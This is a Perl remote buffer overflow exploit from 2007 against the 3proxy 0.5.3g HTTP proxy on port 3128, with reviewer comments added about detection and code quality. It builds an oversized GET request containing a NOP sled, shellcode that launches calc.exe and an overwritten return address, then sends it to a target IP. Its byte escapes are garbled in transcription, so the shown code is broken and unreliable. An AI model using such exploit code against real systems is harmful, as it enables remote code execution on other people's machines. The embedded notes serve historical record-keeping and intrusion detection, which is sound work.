
# Title : 3proxy 0.5.3g logurl() Remote Buffer Overflow Exploit (win32) (pl)
# Published : 2007-12-18
# Author : Marcin Kozlowski


#!/usr/bin/perl
# This module exploits a stack overflow in 3Proxy prior to 0.5.3h, and 0.6b-devel before
# 20070413. By sending a long Host header in an HTTP GET request to the default port 3128,
# a remote attacker could overflow a buffer and execute arbitrary code.
#
# Marcin Kozlowski based on vade79 PoC
#
# NOTE(review): historical proof-of-concept (2007), kept here as a record of the bug.
# For a defender the relevant facts visible in this script are: the affected service is
# reached on TCP 3128 (see $port); the trigger is a single HTTP/1.0 GET whose request path
# is more than 1 KB long and whose Host header is ~1 KB of filler (see $A and $B); and the
# remedy is the upgrade named above. A request of that shape arriving at a proxy port is a
# reasonable thing to alert on in proxy logs or an IDS.
# NOTE(review): the script has no `use strict; use warnings;`, so every variable below is
# an unchecked package global; a typo in a name would silently create a new variable.

# IO::Socket for network connections
use IO::Socket;

# The ip address is our first commandline argument, also known as $ARGV[0] in Perl.
# NOTE(review): read here but only checked after the request string has been built and
# printed (see the `if(!$ip)` block further down).
$ip = $ARGV[0];

# Our nopsled.
# NOTE(review): as transcribed, the backslash of every `\x` escape is missing ("x90",
# not "\x90"), so this and the other byte strings below are literal ASCII characters,
# not the bytes the comments describe; the same applies to the "n" line endings in
# $attackstring and the die message. The listing as shown is therefore not the byte
# sequence the original PoC sent.
$nopsled = "x90"x36;
$A = "A" x 1064;   # filler placed in the request path
$B = "B" x 999;    # filler placed in the Host header



# Execute calc.exe (payload from the original PoC; opaque byte string, see note on $nopsled).
#
$payload = 

"x54x50x53x50x29xc9x83xe9xdexe8xffxffxffxffxc0x5ex81x76x0ex02".
"xddx0ex4dx83xeexfcxe2xf4xfex35x4ax4dx02xddx85x08x3ex56x72x48".
"x7axdcxe1xc6x4dxc5x85x12x22xdcxe5x04x89xe9x85x4cxecxecxcexd4".
"xaex59xcex39x05x1cxc4x40x03x1fxe5xb9x39x89x2ax49x77x38x85x12".
"x26xdcxe5x2bx89xd1x45xc6x5dxc1x0fxa6x89xc1x85x4cxe9x54x52x69".
"x06x1ex3fx8dx66x56x4ex7dx87x1dx76x41x89x9dx02xc6x72xc1xa3xc6".
"x6axd5xe5x44x89x5dxbex4dx02xddx85x25x3ex82x3fxbbx62x8bx87xb5".
"x81x1dx75x1dx6axa3xd6xafx71xb5x96xb3x88xd3x59xb2xe5xbex6fx21".
"x61xddx0ex4d";


# Our extended instruction pointer which we use to overwrite the remote eip.
# Remember to make it little-endian format.
# NOTE(review): the "call esp" remark is the author's claim about the target binary;
# nothing in this file establishes it.

$eip = "x72x93xabx71"; #call esp


# We construct our full attack string here: an HTTP/1.0 GET whose path is $A + $eip +
# $nopsled + $payload and whose Host header is $B.
$attackstring = "GET /".$A.$eip.$nopsled.$payload." HTTP/1.0nHost: ".$B."nn";


# Echo the raw request to STDOUT before connecting (the byte strings go to the terminal).
print $attackstring;

# View a message if no ip address is given.
# NOTE(review): this runs after the string has already been built and printed.
if(!$ip)
{

die "You have to provide the target's IP Address..n";

}

# The remote port to connect to (3proxy's default HTTP proxy port).
$port = '3128';

# The connection protocol to use.
$protocol = 'tcp';

# Create the actual network connection with a 1-second connect timeout,
# and print an error message if it's not possible to create a socket.
# NOTE(review): the die message omits $!, so the reason for a failed connect is lost.
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
                                PeerPort=>$port,
                                Proto=>$protocol,
                                Timeout=>'1') || die "Could not create socketn";


# Send the request to the remote computer in a single write; no response is read.
print $socket $attackstring;

# Close the connection.
close($socket);
